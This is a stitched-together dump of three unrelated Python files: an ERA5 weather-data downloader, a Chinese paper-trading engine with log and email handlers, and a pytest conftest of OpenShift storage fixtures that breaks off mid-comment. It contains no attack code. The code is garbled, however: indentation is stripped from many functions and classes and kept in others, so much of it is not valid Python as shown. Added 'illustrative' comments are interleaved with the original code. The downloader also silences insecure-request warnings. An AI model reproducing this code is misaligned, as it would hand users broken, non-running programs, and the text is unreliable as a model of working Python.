This module provides functionality to download the needed weather data
"""
from gisme import (era5_path, lon_min, lon_max, lat_min, lat_max)
import os
import cdsapi
import urllib3
import threading
# to suppress InsecureRequestWarning thrown when using mobile network or some sorts of networks
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def retrieve_year():
while True:
# if list with pairs of year and list of months is empty, exit loop
if not yms:
print('list is empty')
break
year, month = yms.pop()
# set up paths
ncfile = f'ERA5_RSL_{year}{month}.nc'
file_path = era5_path+ncfile
# check if file already exists, if so, continue with next file
if os.path.exists(file_path):
print(f'{ncfile} already exists')
continue
try:
client.retrieve(
'reanalysis-era5-single-levels',
{
'product_type': 'reanalysis',
'variable': [
'10m_u_component_of_wind', '10m_v_component_of_wind', '2m_temperature',
'leaf_area_index_high_vegetation', 'leaf_area_index_low_vegetation', 'low_cloud_cover',
'soil_temperature_level_1', 'surface_latent_heat_flux', 'surface_net_thermal_radiation',
'surface_sensible_heat_flux', 'total_cloud_cover', 'total_column_rain_water',
'total_sky_direct_solar_radiation_at_surface'
],
'year': [
str(year)
],
'month': [
month
],
'day': [
'01', '02', '03',
'04', '05', '06',
'07', '08', '09',
'10', '11', '12',
'13', '14', '15',
'16', '17', '18',
'19', '20', '21',
'22', '23', '24',
'25', '26', '27',
'28', '29', '30',
'31'
],
'area': [
lat_max, lon_min, lat_min, lon_max # N, W, S, E
],
'grid': [
0.25, 0.25
],
'time': [
'00:00', '02:00', '04:00',
'06:00', '08:00', '10:00',
'12:00', '14:00', '16:00',
'18:00', '20:00', '22:00'
],
'format': 'netcdf'
},
f'{era5_path}{ncfile}')
        except Exception as err:
            print(f'download not available for {year} in month {month}: {err}')
def download_ecmwf_data():
# create folder to store data if it does not exist yet
if not os.path.exists(era5_path):
os.makedirs(era5_path)
###################
# retrieving data #
###################
# may be used too, but actually 10 is a good number as copernicus allows up to 10 threads
# num_threads = os.cpu_count()
threads = []
for i in range(10):
t = threading.Thread(target=retrieve_year)
t.start()
threads.append(t)
for t in threads:
t.join()
######################################
# uncomment the following section to #
# download weather data from ecmwf #
######################################
client = cdsapi.Client()
"""
yms is a list of tuples, each tuple containing a year and a month;
the data is split into single months, because the size of files
that are downloaded is limited by copernicus
"""
years = range(2015, 2019)
months = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']
yms = []
for year in years:
for month in months:
yms.append((str(year), month))
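# For the ranges above, yms starts as
#   [('2015', '01'), ('2015', '02'), ..., ('2018', '12')]
# and each worker thread in retrieve_year() pops (year, month) pairs from the
# end of the list until it is empty.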
download_ecmwf_data()
|
pt_engine.py
|
import logging
import smtplib
from abc import ABC
from queue import Empty, Queue
from threading import Thread
from email.message import EmailMessage
from ..event import EventEngine, Event
from ..api.db import MongoDBService
from ..api.pytdx_api import PYTDXService
from ..utility.setting import SETTINGS
from ..utility.model import LogData
from ..utility.event import EVENT_LOG, EVENT_ERROR, EVENT_MARKET_CLOSE
from paper_trading.utility.constant import PersistanceMode
from paper_trading.trade.market import ChinaAMarket
from paper_trading.trade.account_engine import AccountEngine
class MainEngine:
    """Main engine for paper trading"""
    def __init__(self, event_engine: EventEngine = None, market=None, param: dict = None):
        # bind the event engine
        if not event_engine:
            self.event_engine = EventEngine()
        else:
            self.event_engine = event_engine
        self.event_engine.start()
        self._settings = SETTINGS  # configuration parameters
        self.__active = False  # main engine state
        self.pst_active = None  # data persistence switch
        self._market = market  # trading market
        self.account_engine = None  # account engine
        self.order_put = None  # order callback function
        # update parameters
        self._settings.update(param)
        # start the log engine
        log = LogEngine(self.event_engine)
        log.register_event()
        # start the email engine
        # self.email = EmailEngine(self.event_engine)
        # self.email.start()
        # market simulation trading thread
        self._thread = Thread(target=self._run)
        # register event listeners
        self.event_register()
        self.write_log("模拟交易主引擎:初始化完毕")
    def event_register(self):
        """Register event listeners"""
        self.event_engine.register(EVENT_ERROR, self.process_error_event)
        self.event_engine.register(EVENT_MARKET_CLOSE, self.process_market_close)
    def start(self):
        """Initialize and start the engine"""
        self.write_log("模拟交易主引擎:启动")
        # check the engine working parameters
        self._param_check()
        # persistence configuration
        if self._settings["PERSISTENCE_MODE"] == PersistanceMode.REALTIME:
            self.pst_active = True
        elif self._settings["PERSISTENCE_MODE"] == PersistanceMode.MANUAL:
            self.pst_active = False
        else:
            raise ValueError("持久化参数错误")
        # connect to the database
        db = self.creat_db()
        # connect to the market data source
        hq_client = self.creat_hq_api()
        # start the account engine
        self.account_engine = AccountEngine(self.event_engine, self.pst_active, self._settings["LOAD_DATA_MODE"], db)
        self.account_engine.start()
        # use ChinaAMarket by default
        if not self._market or isinstance(self._market, ChinaAMarket):
            self._market = ChinaAMarket(self.event_engine, self.account_engine, hq_client, {})
        else:
            self._market = self._market(self.event_engine, self.account_engine, hq_client, {})
        # initialize the trading market and get back the order-push function
        self.order_put = self._market.on_init()
        # start the order-book matching routine
        self._thread.start()
        self.__active = True
        return self
    def _run(self):
        """Run the order-book matching routine"""
        self._market.on_match()
    def _close(self):
        """Shut down the paper trading engine"""
        # close the market
        self._market._active = False
        self._thread.join()
        self.__active = False
        self.write_log("模拟交易主引擎:关闭")
    def _param_check(self):
        """Check the engine working parameters"""
        if not self._settings["PERSISTENCE_MODE"]:
            raise ValueError("数据持久化参数未配置")
    def on_orders_arrived(self, order):
        """Handle an arriving order"""
        if self.__active:
            status, msg = self.account_engine.orders_arrived(order)
            return status, msg
        else:
            return False, "交易市场关闭"
    def process_market_close(self, event):
        """Handle market close"""
        market_name = event.data
        self.write_log("{}: 交易市场闭市".format(market_name))
        self._close()
    def process_error_event(self, event):
        """Handle system errors"""
        msg = event.data
        self.write_log(msg, level=logging.CRITICAL)
        # self.email.queue.put(msg)
    def creat_db(self):
        """Instantiate the database service"""
        host = self._settings.get("MONGO_HOST", "localhost")
        port = self._settings.get("MONGO_PORT", 27017)
        db = MongoDBService(host, port)
        db.connect_db()
        return db
    def creat_hq_api(self):
        """Instantiate the market data (pytdx) client"""
        tdx = PYTDXService(self.creat_db().db_client)
        tdx.connect_api()
        return tdx
def write_log(self, msg: str, level: int = logging.INFO):
""""""
log = LogData(log_content=msg, log_level=level)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
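# Hedged usage sketch for MainEngine (the parameter names follow the SETTINGS
# keys referenced above; the concrete values are placeholders, not a
# recommended configuration):
#   engine = MainEngine(param={
#       "PERSISTENCE_MODE": PersistanceMode.REALTIME,
#       "LOAD_DATA_MODE": ...,          # whatever load mode your deployment uses
#       "MONGO_HOST": "localhost",
#       "MONGO_PORT": 27017,
#   }).start()
#   status, msg = engine.on_orders_arrived(order)  # `order` comes from the caller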
class Singleton(type):
"""
Singleton metaclass,
class A:
__metaclass__ = Singleton
"""
_instances = {}
def __call__(cls, *args, **kwargs):
""""""
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
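# Note / hedged example: the docstring above shows the Python 2 idiom. Under
# Python 3 the metaclass has to be declared in the class header for the
# singleton behaviour to take effect, e.g.:
#   class OnlyOne(metaclass=Singleton):
#       pass
#   assert OnlyOne() is OnlyOne()
# Assigning `__metaclass__` inside the class body (as LogEngine does below) is
# a no-op on Python 3.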
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self, event_engine: EventEngine, engine_name: str,
):
""""""
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
__metaclass__ = Singleton
def __init__(self, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("lazyTrader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter("%(asctime)s %(levelname)s: %(message)s")
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Output log event data with logging function.
"""
log = event.data
self.logger.log(log.log_level, log.log_content)
def close(self):
""""""
pass
class EmailEngine(BaseEngine):
    """
    Email engine.
    """
def __init__(self, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(SETTINGS["email.server"], SETTINGS["email.port"]) as smtp:
smtp.login(SETTINGS["email.username"], SETTINGS["email.password"])
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
conftest.py
|
import logging
import os
import random
import time
import tempfile
import threading
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import datetime
from math import floor
from shutil import copyfile
from functools import partial
from botocore.exceptions import ClientError
import pytest
from ocs_ci.deployment import factory as dep_factory
from ocs_ci.framework import config
from ocs_ci.framework.pytest_customization.marks import (
deployment,
ignore_leftovers,
tier_marks,
ignore_leftover_label,
)
from ocs_ci.ocs import constants, defaults, fio_artefacts, node, ocp, platform_nodes
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.exceptions import (
CommandFailed,
TimeoutExpiredError,
CephHealthException,
ResourceWrongStatusException,
UnsupportedPlatformError,
)
from ocs_ci.ocs.mcg_workload import mcg_job_factory as mcg_job_factory_implementation
from ocs_ci.ocs.node import get_node_objs, schedule_nodes
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pvc
from ocs_ci.ocs.utils import setup_ceph_toolbox, collect_ocs_logs
from ocs_ci.ocs.resources.backingstore import (
backingstore_factory as backingstore_factory_implementation,
)
from ocs_ci.ocs.resources.namespacestore import (
namespace_store_factory as namespacestore_factory_implementation,
)
from ocs_ci.ocs.resources.bucketclass import (
bucket_class_factory as bucketclass_factory_implementation,
)
from ocs_ci.ocs.resources.cloud_manager import CloudManager
from ocs_ci.ocs.resources.cloud_uls import (
cloud_uls_factory as cloud_uls_factory_implementation,
)
from ocs_ci.ocs.node import check_nodes_specs
from ocs_ci.ocs.resources.mcg import MCG
from ocs_ci.ocs.resources.objectbucket import BUCKET_MAP
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.pod import (
get_rgw_pods,
delete_deploymentconfig_pods,
get_pods_having_label,
get_deployments_having_label,
Pod,
)
from ocs_ci.ocs.resources.pvc import PVC, create_restore_pvc
from ocs_ci.ocs.version import get_ocs_version, report_ocs_version
from ocs_ci.ocs.cluster_load import ClusterLoad, wrap_msg
from ocs_ci.utility import aws
from ocs_ci.utility import deployment_openshift_logging as ocp_logging_obj
from ocs_ci.utility import templating
from ocs_ci.utility import users, kms as KMS
from ocs_ci.utility.environment_check import (
get_status_before_execution,
get_status_after_execution,
)
from ocs_ci.utility.flexy import load_cluster_info
from ocs_ci.utility.prometheus import PrometheusAPI
from ocs_ci.utility.uninstall_openshift_logging import uninstall_cluster_logging
from ocs_ci.utility.utils import (
ceph_health_check,
ceph_health_check_base,
get_running_ocp_version,
get_openshift_client,
get_system_architecture,
get_testrun_name,
load_auth_config,
ocsci_log_path,
skipif_ocp_version,
skipif_ocs_version,
TimeoutSampler,
skipif_upgraded_from,
update_container_with_mirrored_image,
)
from ocs_ci.helpers import helpers
from ocs_ci.helpers.helpers import create_unique_resource_name
from ocs_ci.ocs.bucket_utils import get_rgw_restart_counts
from ocs_ci.ocs.pgsql import Postgresql
from ocs_ci.ocs.resources.rgw import RGW
from ocs_ci.ocs.jenkins import Jenkins
from ocs_ci.ocs.couchbase import CouchBase
from ocs_ci.ocs.amq import AMQ
from ocs_ci.ocs.elasticsearch import ElasticSearch
from ocs_ci.ocs.ui.base_ui import login_ui, close_browser
from ocs_ci.ocs.ripsaw import RipSaw
log = logging.getLogger(__name__)
class OCSLogFormatter(logging.Formatter):
def __init__(self):
fmt = (
"%(asctime)s - %(threadName)s - %(levelname)s - %(name)s.%(funcName)s.%(lineno)d "
"- %(message)s"
)
super(OCSLogFormatter, self).__init__(fmt)
def pytest_logger_config(logger_config):
logger_config.add_loggers([""], stdout_level="info")
logger_config.set_log_option_default("")
logger_config.split_by_outcome()
logger_config.set_formatter_class(OCSLogFormatter)
def pytest_collection_modifyitems(session, items):
"""
A pytest hook to filter out skipped tests satisfying
skipif_ocp_version, skipif_ocs_version or skipif_upgraded_from
Args:
session: pytest session
items: list of collected tests
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
if not (teardown or deploy):
for item in items[:]:
skipif_ocp_version_marker = item.get_closest_marker("skipif_ocp_version")
skipif_ocs_version_marker = item.get_closest_marker("skipif_ocs_version")
skipif_upgraded_from_marker = item.get_closest_marker(
"skipif_upgraded_from"
)
if skipif_ocp_version_marker:
skip_condition = skipif_ocp_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocp_version(skip_condition[0]):
log.info(
f"Test: {item} will be skipped due to OCP {skip_condition}"
)
items.remove(item)
continue
if skipif_ocs_version_marker:
skip_condition = skipif_ocs_version_marker.args
# skip_condition will be a tuple
# and condition will be first element in the tuple
if skipif_ocs_version(skip_condition[0]):
log.info(f"Test: {item} will be skipped due to {skip_condition}")
items.remove(item)
continue
if skipif_upgraded_from_marker:
skip_args = skipif_upgraded_from_marker.args
if skipif_upgraded_from(skip_args[0]):
log.info(
f"Test: {item} will be skipped because the OCS cluster is"
f" upgraded from one of these versions: {skip_args[0]}"
)
items.remove(item)
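# Illustrative sketch (not part of the original conftest): the hook above only
# acts on tests carrying these markers. A hypothetical test could request
# conditional skipping like this (the marker argument format is an assumption):
#
#     @pytest.mark.skipif_ocs_version("<4.6")
#     @pytest.mark.skipif_upgraded_from(["4.4"])
#     def test_feature_requiring_recent_ocs():
#         ...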
@pytest.fixture()
def supported_configuration():
"""
Check that cluster nodes have enough CPU and Memory as described in:
https://access.redhat.com/documentation/en-us/red_hat_openshift_container_storage/4.2/html-single/planning_your_deployment/index#infrastructure-requirements_rhocs
This fixture is intended as a prerequisite for tests or fixtures that
run flaky on configurations that don't meet minimal requirements.
Minimum requirements for each starting node (OSD+MON):
16 CPUs
64 GB memory
Last documentation check: 2020-02-21
"""
min_cpu = constants.MIN_NODE_CPU
min_memory = constants.MIN_NODE_MEMORY
log.info("Checking if system meets minimal requirements")
if not check_nodes_specs(min_memory=min_memory, min_cpu=min_cpu):
err_msg = (
f"At least one of the worker nodes doesn't meet the "
f"required minimum specs of {min_cpu} vCPUs and {min_memory} RAM"
)
pytest.xfail(err_msg)
@pytest.fixture(scope="session", autouse=True)
def auto_load_auth_config():
try:
auth_config = {"AUTH": load_auth_config()}
config.update(auth_config)
except FileNotFoundError:
pass # If auth file doesn't exist we just ignore.
@pytest.fixture(scope="class")
def secret_factory_class(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="session")
def secret_factory_session(request):
return secret_factory_fixture(request)
@pytest.fixture(scope="function")
def secret_factory(request):
return secret_factory_fixture(request)
def secret_factory_fixture(request):
"""
Secret factory. Calling this fixture creates a new secret.
RBD based is default.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(interface=constants.CEPHBLOCKPOOL):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
"""
secret_obj = helpers.create_secret(interface_type=interface)
assert secret_obj, "Failed to create a secret"
instances.append(secret_obj)
return secret_obj
def finalizer():
"""
Delete the RBD secrets
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
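# Usage sketch (illustrative only, the test name is hypothetical): a test that
# needs a CephFS secret can request the function-scoped fixture and call it;
# the finalizer above deletes the secret afterwards.
#
#     def test_with_secret(secret_factory):
#         cephfs_secret = secret_factory(interface=constants.CEPHFILESYSTEM)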
@pytest.fixture(scope="session", autouse=True)
def log_ocs_version(cluster):
"""
Fixture handling version reporting for OCS.
This fixture handles alignment of the version reporting, so that we:
* report version for each test run (no matter if just deployment, just
test or both deployment and tests are executed)
* prevent conflict of version reporting with deployment/teardown (eg. we
should not run the version logging before actual deployment, or after
a teardown)
Version is reported in:
* log entries of INFO log level during test setup phase
* ocs_version file in cluster path directory (for copy pasting into bug
reports)
"""
teardown = config.RUN["cli_params"].get("teardown")
deploy = config.RUN["cli_params"].get("deploy")
dev_mode = config.RUN["cli_params"].get("dev_mode")
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if teardown and not deploy:
log.info("Skipping version reporting for teardown.")
return
elif dev_mode:
log.info("Skipping version reporting for development mode.")
return
elif skip_ocs_deployment:
log.info("Skipping version reporting since OCS deployment is skipped.")
return
cluster_version, image_dict = get_ocs_version()
file_name = os.path.join(
config.ENV_DATA["cluster_path"], "ocs_version." + datetime.now().isoformat()
)
with open(file_name, "w") as file_obj:
report_ocs_version(cluster_version, image_dict, file_obj)
log.info("human readable ocs version info written into %s", file_name)
@pytest.fixture(scope="class")
def ceph_pool_factory_class(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="session")
def ceph_pool_factory_session(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
@pytest.fixture(scope="function")
def ceph_pool_factory(request, replica=3, compression=None):
return ceph_pool_factory_fixture(request, replica=replica, compression=compression)
def ceph_pool_factory_fixture(request, replica=3, compression=None):
"""
Create a Ceph pool factory.
Calling this fixture creates new Ceph pool instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL, replica=replica, compression=compression
):
if interface == constants.CEPHBLOCKPOOL:
ceph_pool_obj = helpers.create_ceph_block_pool(
replica=replica, compression=compression
)
elif interface == constants.CEPHFILESYSTEM:
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
).get(defaults.CEPHFILESYSTEM_NAME)
ceph_pool_obj = OCS(**cfs)
assert ceph_pool_obj, f"Failed to create {interface} pool"
if interface != constants.CEPHFILESYSTEM:
instances.append(ceph_pool_obj)
return ceph_pool_obj
def finalizer():
"""
Delete the Ceph block pool
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
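# Usage sketch (illustrative only): create a compressed RBD pool with a custom
# replica count; the compression value shown is an assumption, any value
# accepted by helpers.create_ceph_block_pool would do.
#
#     def test_with_pool(ceph_pool_factory):
#         pool = ceph_pool_factory(
#             interface=constants.CEPHBLOCKPOOL,
#             replica=2,
#             compression="aggressive",
#         )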
@pytest.fixture(scope="class")
def storageclass_factory_class(request, ceph_pool_factory_class, secret_factory_class):
return storageclass_factory_fixture(
request, ceph_pool_factory_class, secret_factory_class
)
@pytest.fixture(scope="session")
def storageclass_factory_session(
request, ceph_pool_factory_session, secret_factory_session
):
return storageclass_factory_fixture(
request, ceph_pool_factory_session, secret_factory_session
)
@pytest.fixture(scope="function")
def storageclass_factory(request, ceph_pool_factory, secret_factory):
return storageclass_factory_fixture(request, ceph_pool_factory, secret_factory)
def storageclass_factory_fixture(
request,
ceph_pool_factory,
secret_factory,
):
"""
Create a storage class factory. Default is RBD based.
Calling this fixture creates new storage class instance.
** This method should not be used anymore **
** This method is for internal testing only **
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
secret=None,
custom_data=None,
sc_name=None,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
replica=3,
compression=None,
new_rbd_pool=False,
pool_name=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
are not used but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
than the default rbd pool.
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
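# Usage sketch (illustrative only): request an RBD storage class backed by a
# freshly created pool, using only parameters documented in the factory above.
#
#     def test_with_storageclass(storageclass_factory):
#         sc_obj = storageclass_factory(
#             interface=constants.CEPHBLOCKPOOL,
#             new_rbd_pool=True,
#             replica=2,
#             compression="aggressive",
#         )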
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
"""
Delete the project
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}Gi" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
# Workaround for bug 1915706, increasing timeout from 180 to 720
timeout = (
720
if config.ENV_DATA["platform"].lower() == constants.AZURE_PLATFORM
else 180
)
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=timeout)
request.addfinalizer(finalizer)
return factory
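# Usage sketch (illustrative only, sizes are arbitrary): request a 10 GiB RWX
# CephFS PVC and a raw block RBD PVC; both are removed by the finalizer above.
#
#     def test_with_pvcs(pvc_factory):
#         cephfs_pvc = pvc_factory(
#             interface=constants.CEPHFILESYSTEM,
#             size=10,
#             access_mode=constants.ACCESS_MODE_RWX,
#         )
#         block_pvc = pvc_factory(size=5, volume_mode="Block")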
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
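# Usage sketch (illustrative only): attach a pod to a PVC created by
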